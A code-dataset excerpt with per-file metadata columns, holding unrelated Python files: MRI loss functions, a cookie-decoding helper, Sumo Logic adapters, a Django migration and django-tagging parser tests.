| 0.746915
| 0
| 0.024849
| 0.294183
| 29,706
| 858
| 99
| 34.622378
| 0.752134
| 0.010402
| 0
| 0.714859
| 0
| 0
| 0.248069
| 0.10947
| 0
| 0
| 0
| 0
| 0.045515
| 1
| 0.028112
| false
| 0
| 0.02008
| 0.002677
| 0.058902
| 0.001339
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8738966016e8184fc947f7d9569cb68e390487a6
| 11,692
|
py
|
Python
|
interlacer/losses.py
|
nalinimsingh/interlacer
|
d447b7cd6b64337028342377218b61b6cb474a97
|
[
"MIT"
] | 16
|
2020-07-06T00:33:46.000Z
|
2021-04-22T20:17:12.000Z
|
interlacer/losses.py
|
nalinimsingh/interlacer
|
d447b7cd6b64337028342377218b61b6cb474a97
|
[
"MIT"
] | 1
|
2020-07-11T21:21:36.000Z
|
2021-02-18T19:29:03.000Z
|
interlacer/losses.py
|
nalinimsingh/interlacer
|
d447b7cd6b64337028342377218b61b6cb474a97
|
[
"MIT"
] | 5
|
2020-07-06T01:17:31.000Z
|
2021-01-20T15:15:31.000Z
|
import sys
import numpy as np
import tensorflow.compat.v1 as tf
from tensorflow.keras import backend as K
from interlacer import utils
try:
import lpips_tf
except:
pass
def join_reim_mag_output(tensor):
    """Collapse a real/imag-split tensor into its complex magnitude.

    The original docstring claimed the result was the "joined real and imag
    parts" of shape (batch_size, n, n); the code actually takes the complex
    magnitude and re-adds a trailing channel axis.

    Args:
        tensor: Tensor of shape (batch_size, n, n, 2) with real and
            imaginary components split along the last axis.

    Returns:
        Tensor of shape (batch_size, n, n, 1) holding the elementwise
        complex magnitude.
    """
    complex_tensor = utils.join_reim_tensor(tensor)
    return tf.expand_dims(K.abs(complex_tensor), -1)
def fourier_loss(output_domain, loss):
    """Build a loss function computed on Fourier-space data.

    Args:
        output_domain(str): Network output domain ('FREQ' or 'IMAGE')
        loss(str): Loss type ('L1' or 'L2')

    Returns:
        Function computing loss value from a true and predicted input

    Raises:
        ValueError: If output_domain or loss is unrecognized (the original
            silently returned None, deferring the failure to call time).
    """
    if output_domain == 'FREQ':
        def to_fourier(y):
            # Already frequency-space; compare magnitudes.
            return join_reim_mag_output(y)
    elif output_domain == 'IMAGE':
        def to_fourier(y):
            # Transform to frequency space; compare joined real/imag
            # components (componentwise, not magnitude, as in the original).
            return utils.join_reim_tensor(
                utils.convert_tensor_to_frequency_domain(y))
    else:
        raise ValueError('Unrecognized output_domain: %r' % (output_domain,))

    if loss == 'L1':
        def fourier_l1(y_true, y_pred):
            return K.mean(K.abs(to_fourier(y_true) - to_fourier(y_pred)))
        return fourier_l1
    elif loss == 'L2':
        def fourier_l2(y_true, y_pred):
            return K.mean(K.pow(K.abs(to_fourier(y_true) - to_fourier(y_pred)), 2))
        return fourier_l2
    raise ValueError('Unrecognized loss: %r' % (loss,))
def comp_image_loss(output_domain, loss):
    """Build a loss computed on real and imaginary image-space components.

    Args:
        output_domain(str): Network output domain ('FREQ' or 'IMAGE')
        loss(str): Loss type ('L1' or 'L2')

    Returns:
        Function computing loss value from a true and predicted input

    Raises:
        ValueError: If output_domain or loss is unrecognized (the original
            silently returned None).
    """
    if output_domain == 'IMAGE':
        def to_image(y):
            return y
    elif output_domain == 'FREQ':
        def to_image(y):
            return utils.convert_tensor_to_image_domain(y)
    else:
        raise ValueError('Unrecognized output_domain: %r' % (output_domain,))

    if loss == 'L1':
        def image_l1(y_true, y_pred):
            return K.mean(K.abs(to_image(y_true) - to_image(y_pred)))
        return image_l1
    elif loss == 'L2':
        def image_l2(y_true, y_pred):
            return K.mean(K.pow(K.abs(to_image(y_true) - to_image(y_pred)), 2))
        return image_l2
    raise ValueError('Unrecognized loss: %r' % (loss,))
def image_loss(output_domain, loss):
    """Build a loss computed on image-space magnitudes.

    Args:
        output_domain(str): Network output domain ('FREQ' or 'IMAGE')
        loss(str): Loss type ('L1' or 'L2')

    Returns:
        Function computing loss value from a true and predicted input

    Raises:
        ValueError: If output_domain or loss is unrecognized (the original
            silently returned None).
    """
    if output_domain == 'IMAGE':
        def to_image_mag(y):
            return join_reim_mag_output(y)
    elif output_domain == 'FREQ':
        def to_image_mag(y):
            # Transform frequency-space output to image space first.
            return join_reim_mag_output(
                utils.convert_tensor_to_image_domain(y))
    else:
        raise ValueError('Unrecognized output_domain: %r' % (output_domain,))

    if loss == 'L1':
        def image_l1(y_true, y_pred):
            return K.mean(K.abs(to_image_mag(y_true) - to_image_mag(y_pred)))
        return image_l1
    elif loss == 'L2':
        def image_l2(y_true, y_pred):
            return K.mean(K.pow(K.abs(to_image_mag(y_true) - to_image_mag(y_pred)), 2))
        return image_l2
    raise ValueError('Unrecognized loss: %r' % (loss,))
def joint_img_freq_loss(output_domain, loss, loss_lambda):
    """Build a loss computed on both Fourier- and image-space data.

    Args:
        output_domain(str): Network output domain ('FREQ' or 'IMAGE')
        loss(str): Loss type ('L1' or 'L2')
        loss_lambda(float): Weighting of freq loss vs image loss

    Returns:
        Function computing loss value from a true and predicted input
    """
    # Build the component losses once, not on every training-step call
    # (the original reconstructed both closures inside joint_loss).
    img_loss_fn = image_loss(output_domain, loss)
    freq_loss_fn = fourier_loss(output_domain, loss)

    def joint_loss(y_true, y_pred):
        return (img_loss_fn(y_true, y_pred)
                + loss_lambda * freq_loss_fn(y_true, y_pred))
    return joint_loss
if 'lpips_tf' in sys.modules:
    def lpips(output_domain):
        """Build an LPIPS perceptual loss on image-space magnitudes.

        Only defined when the optional lpips_tf dependency imported
        successfully. (The original docstring incorrectly said "SSIM".)

        Args:
            output_domain(str): Network output domain ('FREQ' or 'IMAGE')

        Returns:
            Function computing loss value from a true and predicted input

        Raises:
            ValueError: If output_domain is unrecognized (the original
                silently returned None).
        """
        if output_domain == 'IMAGE':
            def to_image_mag(y):
                return join_reim_mag_output(y)
        elif output_domain == 'FREQ':
            def to_image_mag(y):
                return join_reim_mag_output(
                    utils.convert_tensor_to_image_domain(y))
        else:
            raise ValueError('Unrecognized output_domain: %r' % (output_domain,))

        def image_lpips(y_true, y_pred):
            # LPIPS networks expect 3-channel input; tile the magnitude.
            y_true_tiled = K.tile(to_image_mag(y_true), [1, 1, 1, 3])
            y_pred_tiled = K.tile(to_image_mag(y_pred), [1, 1, 1, 3])
            return lpips_tf.lpips(
                y_true_tiled, y_pred_tiled, model='net-lin', net='alex')
        return image_lpips
def joint_fastmri_loss(output_domain, loss):
    """Build a combined SSIM + scaled-PSNR + componentwise-error loss.

    Args:
        output_domain(str): Network output domain ('FREQ' or 'IMAGE')
        loss(str): Loss type ('L1' or 'L2')

    Returns:
        Function computing loss value from a true and predicted input
    """
    # Build the three component losses once instead of on every call
    # (the original reconstructed all three closures inside combined_loss).
    ssim_fn = ssim(output_domain)
    psnr_fn = psnr(output_domain)
    comp_fn = comp_image_loss(output_domain, loss)

    def combined_loss(y_true, y_pred):
        return (ssim_fn(y_true, y_pred)
                + 1 / 33.0 * psnr_fn(y_true, y_pred)
                + 20 * comp_fn(y_true, y_pred))
    return combined_loss
def ssim(output_domain):
    """Build a negated-SSIM loss on image-space magnitudes.

    Args:
        output_domain(str): Network output domain ('FREQ' or 'IMAGE')

    Returns:
        Function computing loss value from a true and predicted input

    Raises:
        ValueError: If output_domain is unrecognized (the original silently
            returned None).
    """
    if output_domain == 'IMAGE':
        def to_image_mag(y):
            return join_reim_mag_output(y)
    elif output_domain == 'FREQ':
        def to_image_mag(y):
            return join_reim_mag_output(
                utils.convert_tensor_to_image_domain(y))
    else:
        raise ValueError('Unrecognized output_domain: %r' % (output_domain,))

    def image_ssim(y_true, y_pred):
        y_true_mag = to_image_mag(y_true)
        y_pred_mag = to_image_mag(y_pred)
        # Negated so that minimizing the loss maximizes SSIM.
        return -1 * tf.image.ssim(y_true_mag, y_pred_mag,
                                  max_val=K.max(y_true_mag), filter_size=7)
    return image_ssim
def ssim_multiscale(output_domain):
    """Build a negated multiscale-SSIM loss on image-space magnitudes.

    (Fixes the "mulstiscale" typo in the original docstring.)

    Args:
        output_domain(str): Network output domain ('FREQ' or 'IMAGE')

    Returns:
        Function computing loss value from a true and predicted input

    Raises:
        ValueError: If output_domain is unrecognized (the original silently
            returned None).
    """
    if output_domain == 'IMAGE':
        def to_image_mag(y):
            return join_reim_mag_output(y)
    elif output_domain == 'FREQ':
        def to_image_mag(y):
            return join_reim_mag_output(
                utils.convert_tensor_to_image_domain(y))
    else:
        raise ValueError('Unrecognized output_domain: %r' % (output_domain,))

    def image_ssim_ms(y_true, y_pred):
        y_true_mag = to_image_mag(y_true)
        y_pred_mag = to_image_mag(y_pred)
        # Negated so that minimizing the loss maximizes MS-SSIM.
        return -1 * tf.image.ssim_multiscale(
            y_true_mag, y_pred_mag, max_val=K.max(y_true_mag))
    return image_ssim_ms
def psnr(output_domain):
    """Build a negated-PSNR loss on image-space magnitudes.

    Args:
        output_domain(str): Network output domain ('FREQ' or 'IMAGE')

    Returns:
        Function computing loss value from a true and predicted input

    Raises:
        ValueError: If output_domain is unrecognized (the original silently
            returned None).
    """
    if output_domain == 'IMAGE':
        def to_image_mag(y):
            return join_reim_mag_output(y)
    elif output_domain == 'FREQ':
        def to_image_mag(y):
            return join_reim_mag_output(
                utils.convert_tensor_to_image_domain(y))
    else:
        raise ValueError('Unrecognized output_domain: %r' % (output_domain,))

    def image_psnr(y_true, y_pred):
        y_true_mag = to_image_mag(y_true)
        y_pred_mag = to_image_mag(y_pred)
        # Negated so that minimizing the loss maximizes PSNR.
        return -1 * tf.image.psnr(y_true_mag, y_pred_mag,
                                  max_val=K.max(y_true_mag))
    return image_psnr
| 36.883281
| 160
| 0.619398
| 1,681
| 11,692
| 3.986913
| 0.069601
| 0.081319
| 0.058192
| 0.096986
| 0.910773
| 0.908684
| 0.888988
| 0.872725
| 0.872725
| 0.84915
| 0
| 0.010262
| 0.291567
| 11,692
| 316
| 161
| 37
| 0.798865
| 0.242217
| 0
| 0.820225
| 0
| 0
| 0.013799
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.179775
| false
| 0.005618
| 0.033708
| 0.022472
| 0.455056
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5e9642b361200d7786935e1cc9e29af0d8b808ef
| 241
|
py
|
Python
|
zhixuewang/tools/cookies.py
|
lihaoze123/zhixuewang-python
|
7a54bb1ae96f74d3bb3a0845f3b084bb5942f758
|
[
"MIT"
] | 22
|
2019-01-21T03:49:44.000Z
|
2020-02-13T08:43:01.000Z
|
zhixuewang/tools/cookies.py
|
lihaoze123/zhixuewang-python
|
7a54bb1ae96f74d3bb3a0845f3b084bb5942f758
|
[
"MIT"
] | 10
|
2019-01-21T03:50:23.000Z
|
2020-01-03T13:06:49.000Z
|
zhixuewang/tools/cookies.py
|
lihaoze123/zhixuewang-python
|
7a54bb1ae96f74d3bb3a0845f3b084bb5942f758
|
[
"MIT"
] | 3
|
2019-02-17T06:12:35.000Z
|
2019-10-29T13:24:06.000Z
|
from zhixuewang.tools.password_helper import base64_decode
def get_password_from_session(session):
    """Return the decoded password stored in the session's "pwd" cookie."""
    encoded_pwd = session.cookies["pwd"]
    return base64_decode(encoded_pwd)
def get_username_from_session(session):
    """Return the decoded username stored in the session's "uname" cookie."""
    encoded_uname = session.cookies["uname"]
    return base64_decode(encoded_uname)
| 30.125
| 58
| 0.817427
| 32
| 241
| 5.84375
| 0.5
| 0.192513
| 0.192513
| 0.256684
| 0.534759
| 0.534759
| 0.534759
| 0.534759
| 0
| 0
| 0
| 0.027397
| 0.091286
| 241
| 8
| 59
| 30.125
| 0.826484
| 0
| 0
| 0
| 0
| 0
| 0.033058
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.4
| 0.2
| 0.4
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
5eb021c1324131eaf94afd6f99214149f48b2053
| 128
|
py
|
Python
|
encrypted_dns/resolve/__init__.py
|
zhenghaven/encrypted-dns
|
0efefa87309834cd536d59d3e082c084d94ae2fa
|
[
"Apache-2.0"
] | 33
|
2020-07-24T18:51:17.000Z
|
2021-06-10T03:06:36.000Z
|
encrypted_dns/resolve/__init__.py
|
zhenghaven/encrypted-dns
|
0efefa87309834cd536d59d3e082c084d94ae2fa
|
[
"Apache-2.0"
] | null | null | null |
encrypted_dns/resolve/__init__.py
|
zhenghaven/encrypted-dns
|
0efefa87309834cd536d59d3e082c084d94ae2fa
|
[
"Apache-2.0"
] | 4
|
2021-07-14T06:05:45.000Z
|
2022-03-01T05:47:10.000Z
|
from encrypted_dns.resolve.core import WireMessageHandler, OutboundHandler
from encrypted_dns.resolve.cache import CacheHandler
| 42.666667
| 74
| 0.890625
| 15
| 128
| 7.466667
| 0.666667
| 0.232143
| 0.285714
| 0.410714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070313
| 128
| 2
| 75
| 64
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
5eb6ebc6a2e2e4af938da21c6ecf6ce9f2e94659
| 5,408
|
py
|
Python
|
modules/csiem_adapter.py
|
voltaire321/sumologictoolbox
|
548854f6e8586572bff2058f8c822f6485988ebe
|
[
"Apache-2.0"
] | 24
|
2015-12-10T21:18:13.000Z
|
2020-12-10T22:17:24.000Z
|
modules/csiem_adapter.py
|
voltaire321/sumologictoolbox
|
548854f6e8586572bff2058f8c822f6485988ebe
|
[
"Apache-2.0"
] | 8
|
2021-02-12T18:21:37.000Z
|
2022-03-17T04:25:54.000Z
|
modules/csiem_adapter.py
|
voltaire321/sumologictoolbox
|
548854f6e8586572bff2058f8c822f6485988ebe
|
[
"Apache-2.0"
] | 7
|
2015-12-08T00:09:14.000Z
|
2020-06-26T16:27:13.000Z
|
from modules.adapter import SumoAdapter
class SumoCustomInsightAdapter(SumoAdapter):
from modules.shared import import_custom_insight, export_custom_insight
def __init__(self, creds, side, mainwindow):
super(SumoCustomInsightAdapter, self).__init__(creds, side, mainwindow)
def list(self, params=None):
return self.sumo.get_custom_insights_sync()
def get(self, item_name, item_id, params=None):
try:
custom_insight = self.sumo.get_custom_insight(item_id)
return {'status': 'SUCCESS',
'adapter': self,
'payload': custom_insight,
'params': params}
except Exception as e:
raise e
def export_item(self, item_name, item_id, params=None):
try:
custom_insight = self.export_custom_insight(item_id, self.sumo)
return {'status': 'SUCCESS',
'adapter': self,
'payload': custom_insight,
'params': params}
except Exception as e:
raise e
def put(self, item_name, payload, params=None):
try:
result = self.import_custom_insight(payload, self.sumo)
return {'status': 'SUCCESS',
'result': result,
'adapter': self,
'params': params}
except Exception as e:
raise e
def import_item(self, item_name, payload, params=None):
return self.put(item_name, payload, params=params)
def delete(self, item_name, item_id, params=None):
try:
result = self.sumo.delete_custom_insight(item_id)
return {'status': 'SUCCESS',
'result': result,
'adapter': self,
'params': params}
except Exception as e:
raise e
class SumoRuleAdapter(SumoAdapter):
from modules.shared import import_rule, export_rule
def __init__(self, creds, side, mainwindow):
super(SumoRuleAdapter, self).__init__(creds, side, mainwindow)
def list(self, params=None):
if 'query' in params:
query = params['query']
else:
query = ''
return self.sumo.get_rules_sync(query)
def get(self, item_name, item_id, params=None):
try:
rule = self.export_rule(item_id, self.sumo)
return {'status': 'SUCCESS',
'adapter': self,
'payload': rule,
'params': params}
except Exception as e:
raise e
def export_item(self, item_name, item_id, params=None):
return self.get(item_name, item_id, params=params)
def put(self, item_name, payload, params=None):
try:
result = self.import_rule(payload, self.sumo)
return {'status': 'SUCCESS',
'result': result,
'adapter': self,
'params': params}
except Exception as e:
raise e
def import_item(self, item_name, payload, params=None):
return self.put(item_name, payload, params=params)
def delete(self, item_name, item_id, params=None):
try:
result = self.sumo.delete_rule(item_id)
return {'status': 'SUCCESS',
'result': result,
'adapter': self,
'params': params}
except Exception as e:
raise e
class SumoLogMappingAdapter(SumoAdapter):
from modules.shared import import_log_mapping, export_log_mapping
def __init__(self, creds, side, mainwindow):
super(SumoLogMappingAdapter, self).__init__(creds, side, mainwindow)
def list(self, params=None):
if 'query' in params:
query = params['query']
else:
query = ''
return self.sumo.get_log_mappings_sync(query)
def get(self, item_name, item_id, params=None):
try:
mapping = self.sumo.get_log_mapping(item_id)
return {'status': 'SUCCESS',
'adapter': self,
'payload': mapping,
'params': params}
except Exception as e:
raise e
def export_item(self, item_name, item_id, params=None):
try:
mapping = self.export_log_mapping(item_id, self.sumo)
return {'status': 'SUCCESS',
'adapter': self,
'payload': mapping,
'params': params}
except Exception as e:
raise e
def put(self, item_name, payload, params=None):
try:
result = self.import_log_mapping(payload, self.sumo)
return {'status': 'SUCCESS',
'result': result,
'adapter': self,
'params': params}
except Exception as e:
raise e
def import_item(self, item_name, payload, params=None):
return self.put(item_name, payload, params=params)
def delete(self, item_name, item_id, params=None):
try:
result = self.sumo.delete_log_mapping(item_id)
return {'status': 'SUCCESS',
'result': result,
'adapter': self,
'params': params}
except Exception as e:
raise e
| 32.97561
| 79
| 0.547892
| 572
| 5,408
| 4.991259
| 0.090909
| 0.05324
| 0.063047
| 0.104028
| 0.858494
| 0.851489
| 0.809457
| 0.756567
| 0.752364
| 0.752364
| 0
| 0
| 0.354105
| 5,408
| 164
| 80
| 32.97561
| 0.817349
| 0
| 0
| 0.80597
| 0
| 0
| 0.069699
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.156716
| false
| 0
| 0.074627
| 0.037313
| 0.38806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d6ef0b6f39a8f77b766371c7135529f7d1eca42
| 45
|
py
|
Python
|
floris/tools/optimization/__init__.py
|
jialrs/floris-enhanced
|
66cdf1c9597aa3bb4f956cc9a0cb497312a690bf
|
[
"Apache-2.0"
] | null | null | null |
floris/tools/optimization/__init__.py
|
jialrs/floris-enhanced
|
66cdf1c9597aa3bb4f956cc9a0cb497312a690bf
|
[
"Apache-2.0"
] | null | null | null |
floris/tools/optimization/__init__.py
|
jialrs/floris-enhanced
|
66cdf1c9597aa3bb4f956cc9a0cb497312a690bf
|
[
"Apache-2.0"
] | null | null | null |
from . import pyoptsparse
from . import scipy
| 22.5
| 25
| 0.8
| 6
| 45
| 6
| 0.666667
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 45
| 2
| 26
| 22.5
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0d9afc668af8d1c368fefc3b0f0cdc578ff6b40a
| 1,685
|
py
|
Python
|
landavailability/api/migrations/0021_auto_20161216_1535.py
|
alphagov/land-avilability-api
|
048d4eed4caedb7b9f41caa5d69025506b2eb57d
|
[
"MIT"
] | 1
|
2017-07-24T17:00:34.000Z
|
2017-07-24T17:00:34.000Z
|
landavailability/api/migrations/0021_auto_20161216_1535.py
|
alphagov/land-availability-api
|
048d4eed4caedb7b9f41caa5d69025506b2eb57d
|
[
"MIT"
] | 23
|
2016-11-21T15:00:11.000Z
|
2019-06-04T07:07:55.000Z
|
landavailability/api/migrations/0021_auto_20161216_1535.py
|
alphagov/land-avilability-api
|
048d4eed4caedb7b9f41caa5d69025506b2eb57d
|
[
"MIT"
] | 4
|
2017-03-23T16:42:40.000Z
|
2021-12-01T07:27:30.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-12-16 15:35
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0020_auto_20161216_1524'),
]
operations = [
migrations.AlterField(
model_name='broadband',
name='avg_download_speed',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='broadband',
name='avg_upload_speed',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='broadband',
name='max_download_speed',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='broadband',
name='max_upload_speed',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='broadband',
name='min_download_speed',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='broadband',
name='min_upload_speed',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='broadband',
name='speed_30_mb_percentage',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
]
| 33.039216
| 81
| 0.605341
| 178
| 1,685
| 5.483146
| 0.303371
| 0.143443
| 0.179303
| 0.207992
| 0.78791
| 0.78791
| 0.78791
| 0.73873
| 0.73873
| 0.73873
| 0
| 0.040529
| 0.282493
| 1,685
| 50
| 82
| 33.7
| 0.766749
| 0.040356
| 0
| 0.651163
| 1
| 0
| 0.13197
| 0.027881
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.046512
| 0
| 0.116279
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0da9e54587bfc8c7f2ba5674a3c4b6d83df81fc6
| 121,423
|
py
|
Python
|
tagging/tests/tests.py
|
sinyawskiy/django-tagging
|
da00169d1e9be6b960842111ea0db2dced47cc3f
|
[
"BSD-3-Clause"
] | null | null | null |
tagging/tests/tests.py
|
sinyawskiy/django-tagging
|
da00169d1e9be6b960842111ea0db2dced47cc3f
|
[
"BSD-3-Clause"
] | null | null | null |
tagging/tests/tests.py
|
sinyawskiy/django-tagging
|
da00169d1e9be6b960842111ea0db2dced47cc3f
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys, os
from django import forms
from django.db import models
from django.db.models import Q
from django.test import TestCase
from django.contrib.contenttypes.models import ContentType
from tagging.forms import TagAdminForm, TagField
from tagging import conf
from tagging.generic import fetch_content_objects
from tagging.models import Tag, TaggedItem
from tagging.tests.models import Article, Link, Perch, Parrot, FormTest, FormTestNull, DefaultNamespaceTest, DefaultNamespaceTest2, DefaultNamespaceTest3
from tagging.utils import calculate_cloud, check_tag_length, edit_string_for_tags, get_tag_list, get_tag_parts, get_tag, parse_tag_input, split_strip
from tagging.utils import LINEAR
#############
# Utilities #
#############
class TestParseTagInput(TestCase):
def test_with_simple_space_delimited_tags(self):
""" Test with simple space-delimited tags. """
self.assertEquals(parse_tag_input('one'), [u'one'])
self.assertEquals(parse_tag_input('one two'), [u'one', u'two'])
self.assertEquals(parse_tag_input('one two three'), [u'one', u'three', u'two'])
self.assertEquals(parse_tag_input('one one two two'), [u'one', u'two'])
self.assertEquals(parse_tag_input('first:one'), [u'first:one'])
self.assertEquals(parse_tag_input('first:one two'), [u'first:one', u'two'])
self.assertEquals(parse_tag_input('one= second:two :three'),
[u'one', u'second:two', u'three'])
self.assertEquals(parse_tag_input(':one= :two= =three:'),
[u'one', u'three', u'two'])
self.assertEquals(parse_tag_input('=one=two :three:four'),
[u'"three:four"', u'one=two'])
self.assertEquals(parse_tag_input(':=one:two=three=:'),
[u'"one:two"="three=:"'])
self.assertEquals(parse_tag_input('second:one first:one'),
[u'first:one', u'second:one'])
self.assertEquals(parse_tag_input('first:one first:two'),
[u'first:one', u'first:two'])
self.assertEquals(parse_tag_input('first:one first:one second:one'),
[u'first:one', u'second:one'])
self.assertEquals(parse_tag_input('one=two'), [u'one=two'])
self.assertEquals(parse_tag_input('three=four one=two'),
[u'one=two', u'three=four'])
self.assertEquals(parse_tag_input('one=two one=three'),
[u'one=three', u'one=two'])
self.assertEquals(parse_tag_input('first:one=two'), [u'first:one=two'])
self.assertEquals(parse_tag_input('second:one=three first:one=two'),
[u'first:one=two', u'second:one=three'])
self.assertEquals(parse_tag_input('first:one:two=three:four=five'),
[u'first:"one:two"="three:four=five"'])
def test_with_comma_delimited_multiple_words(self):
""" Test with comma-delimited multiple words.
An unquoted comma in the input will trigger this. """
self.assertEquals(parse_tag_input(',one'), [u'one'])
self.assertEquals(parse_tag_input(',one two'), [u'one two'])
self.assertEquals(parse_tag_input('one two,'), [u'one two'])
self.assertEquals(parse_tag_input(',one two three'), [u'one two three'])
self.assertEquals(parse_tag_input('one two three,'), [u'one two three'])
self.assertEquals(parse_tag_input('a-one, a-two and a-three'),
[u'a-one', u'a-two and a-three'])
self.assertEquals(parse_tag_input('a:one, a:two and a=three'),
[u'a:one', u'a:two and a=three'])
self.assertEquals(parse_tag_input('a:one, a:two and a:three'),
[u'a:"two and a:three"', u'a:one'])
self.assertEquals(parse_tag_input('a:one, a:one=two a:one=two'),
[u'a:one', u'a:one="two a:one=two"'])
def test_with_double_quoted_multiple_words(self):
""" Test with double-quoted multiple words.
A completed quote will trigger this. Unclosed quotes are ignored. """
self.assertEquals(parse_tag_input('"one'), [u'one'])
self.assertEquals(parse_tag_input('one"'), [u'one'])
self.assertEquals(parse_tag_input('"one two'), [u'one', u'two'])
self.assertEquals(parse_tag_input('"one two three'), [u'one', u'three', u'two'])
self.assertEquals(parse_tag_input('"one two"'), [u'one two'])
self.assertEquals(parse_tag_input('a-one "a-two and a-three"'),
[u'a-one', u'a-two and a-three'])
self.assertEquals(parse_tag_input('"one""two" "three"'), [u'onetwo', u'three'])
self.assertEquals(parse_tag_input('":one'), [u'one'])
self.assertEquals(parse_tag_input('one="'), [u'one'])
self.assertEquals(parse_tag_input('"one:two"'), [u'"one:two"'])
self.assertEquals(parse_tag_input('one:"two three"'), [u'one:two three'])
self.assertEquals(parse_tag_input('"one:"two"=three"'), [u'"one:two=three"'])
self.assertEquals(parse_tag_input('"one:"two"=three'), [u'"one:two"=three'])
self.assertEquals(parse_tag_input(':"=one":two=three=:'),
[u'"=one:two"="three=:"'])
def test_with_no_loose_commas(self):
""" Test with no loose commas -- split on spaces. """
self.assertEquals(parse_tag_input('one two "thr,ee"'), [u'one', u'thr,ee', u'two'])
self.assertEquals(parse_tag_input('one two:"thr,ee"'), [u'one', u'two:thr,ee'])
self.assertEquals(parse_tag_input('one:two three=four'), [u'one:two', u'three=four'])
def test_with_loose_commas(self):
""" Loose commas - split on commas """
self.assertEquals(parse_tag_input('"one", two three'), [u'one', u'two three'])
self.assertEquals(parse_tag_input('"one", two:three four=five'),
[u'one', u'two:three four=five'])
def test_tags_with_double_quotes_can_contain_commas(self):
""" Double quotes can contain commas """
self.assertEquals(parse_tag_input('a-one "a-two, and a-three"'),
[u'a-one', u'a-two, and a-three'])
self.assertEquals(parse_tag_input('"two", one, one, two, "one"'),
[u'one', u'two'])
def test_with_naughty_input(self):
""" Test with naughty input. """
# Bad users! Naughty users!
self.assertEquals(parse_tag_input(None), [])
self.assertEquals(parse_tag_input(''), [])
self.assertEquals(parse_tag_input('"'), [])
self.assertEquals(parse_tag_input('""'), [])
self.assertEquals(parse_tag_input('"' * 7), [])
self.assertEquals(parse_tag_input(',,,,,,'), [])
self.assertEquals(parse_tag_input('",",",",",",","'), [u','])
self.assertEquals(parse_tag_input(':'), [])
self.assertEquals(parse_tag_input(':::::::'), [u'"::::::"'])
self.assertEquals(parse_tag_input('='), [])
self.assertEquals(parse_tag_input('=' * 7), [])
self.assertEquals(parse_tag_input(':,:,=,=,:,=,:,='), [])
self.assertEquals(parse_tag_input(':= := =: =: : = = :'), [])
self.assertEquals(parse_tag_input('":":":":"="="=":"="'), [u'":":"::="="=:="'])
self.assertEquals(parse_tag_input('foo: =bar'), [u'bar', u'foo'])
self.assertEquals(parse_tag_input('a-one "a-two" and "a-three'),
[u'a-one', u'a-three', u'a-two', u'and'])
def test_with_asterisks(self):
self.assertEquals(parse_tag_input('*:foo bar=*'), [u'*:foo', u'bar=*'])
self.assertEquals(parse_tag_input('*'), ['*'])
